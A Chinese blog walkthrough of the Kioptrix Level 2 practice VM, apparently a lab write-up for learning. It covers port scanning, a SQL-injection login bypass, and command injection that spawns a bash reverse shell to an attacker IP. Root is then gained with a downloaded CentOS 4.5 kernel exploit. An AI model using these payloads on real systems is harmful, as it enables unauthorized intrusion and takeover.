首页 > 其他分享 >skyler实战渗透笔记(十二)—Kioptrix-2

skyler实战渗透笔记(十二)—Kioptrix-2

时间:2022-10-17 16:59:11浏览次数:73  
标签:Kioptrix shell skyler 渗透 笔记 提权 bash

skyler实战渗透笔记:

笔记是为了记录实战渗透学习过程,分享渗透过程思路与方法。

请注意:

对于所有笔记中复现的终端或服务器,都是自行搭建环境或已获授权渗透的。使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。

0x00 前言

0x01 信息收集

0x02 渗透get shell

 

0x00 前言

This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

 困难:easy

 

0x01 信息收集

首先同样的毛病,C段扫不到机器,还是跟上一篇一样的处理方法。

 

 

拿到IP后,先端口扫下:

 

 

 访问下80端口,发现是个登录页面

 

 

 登录页下意识就先考虑SQL注入。

这边有几种方法,首先可以尝试手工注入,直接用Administrator' or 1 #就进来了。

 

 

第二就是使用burpsuite,尝试将所有的sql万能密码通过intruder爆破试试,也能爆破出来

 第三种就是直接用sqlmap跑出来。

进来后发现是个命令执行的对话框,考虑直接使用命令执行漏洞:

 

 

试了下,ls命令能够直接执行,不用拼接:

 

那么直接bash反弹出一个shell来:

127.0.0.1; bash -i >& /dev/tcp/192.168.232.129/8888 0>&1

 

在攻击机器上开启监听

 

 

成功获取到反弹shell

 

 

查看当前权限:

 

 

查看基本信息:

 

 

发现是CentOS 4.5,搜索一下4.5的漏洞,发现有一个提权漏洞:

 

 

直接下载攻击脚本到远程靶机上

 

python -m http.server 9999开启服务器,远端wget下载

 

直接编译,赋权限后执行,成功提权。

 

0x03 思路整理

本次渗透依然比较简单,就是通过sql注入获取到命令执行环境,然后反弹bash,搜索漏洞提权。其中sqlmap第一次默认参数跑不出来,建议增加risk和levle。

标签:Kioptrix,shell,skyler,渗透,笔记,提权,bash
From: https://www.cnblogs.com/Shepherdzhao/p/16799756.html

相关文章

  • Vue笔记
    一、Vue介绍1、Vue简介(1)官网:​英文官网​ 中文官网2、介绍与描述Vue是一套用来动态构建用户界面的渐进式JavaScript框架构建用户界面:把数据......
  • Improving Item Cold-start Recommendation via Model-agnostic Conditional Variatio
    动机本文是2022年SIGIR上的一篇论文。解决推荐系统中冷启动问题通常有两种方法:1.挖掘历史数据中的分布模式,例如学习一个辅助信息到id的映射。2.在交互物品有限的情况下提......
  • 【学习笔记】二分
    你觉得一个算法难,是因为你的大脑对未知世界的恐惧。——yxc简单讲讲二分二分是什么?顾名思义:就是一分为二(✓)它是一种在有序数组中查找某一特定元素的搜索算法......
  • 【笔记】原根
    阶定义阶:满足同余式\(a^n\equiv1\pmodm\)的最小正整数\(n\)存在,称作\(a\)模\(m\)的阶,记作\(\delta_m(a)\)。性质\(a,a^2,\ldots,a^{\delta_m(a......
  • 【SpingBoot学习笔记】SpingBoot之读取resource/config目录下自定义properties文件(注
    之前已经写了一篇读写properties文件的文章,见《Java读取properties配置文件写法》,但如果是springboot项目,配置统一在resource/config目录下,使用注解如何读取呢,写法如下打......
  • 【杂谈】想成为机器学习学霸?先学会做笔记吧(Evernote,BoostNote,Leanote等)
    今天聊聊记笔记这件事儿,在学习的过程中做好总结记录是非常重要的。作者|小满&有三编辑|小满&有三《人类简史》有一个有趣的现象描写:远古时期的智人是看什么就吃什么,会塞......
  • 软件工程导论课程笔记与详解①
    前言:本课程真的就是讲述整个软件工程行业全部流程和所需的所有技术要点,可以说是程序员入门终极指南(笑)。对于未来想要做程序员的宝子十分重要。  课程信息:所用教材:......
  • kafka 知识点 笔记
    kafka知识点笔记使用kafka消息队列的好处:1)、解耦合不用保证两台客户端同时在线,发送端先发送消息暂时存储,接收端上线后可以自己再获取消息......
  • 论文笔记 - Calibrate Before Use: Improving Few-Shot Performance of Language Mode
    Motivation无需参数更新的In-ContextLearning允许使用者在无参数的更新的情况下完成新的下游任务,交互界面是纯粹的自然语言,无NLP技术基础的用户也可以创建NLP系统......
  • 【图像处理笔记】图像分割之形态学分水岭
    0引言迄今为止,我们讨论了基于三个主要概念的分割:边缘检测、阈值处理和区域提取。每种方法都有优点[例如全局阈值处理具有速度优势]和缺点[例如在基于边缘的分割中,需要进......